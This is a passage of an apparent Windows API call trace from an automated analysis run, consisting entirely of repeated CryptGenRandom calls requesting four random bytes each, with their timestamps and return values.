(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.021] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.022] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.023] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.024] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 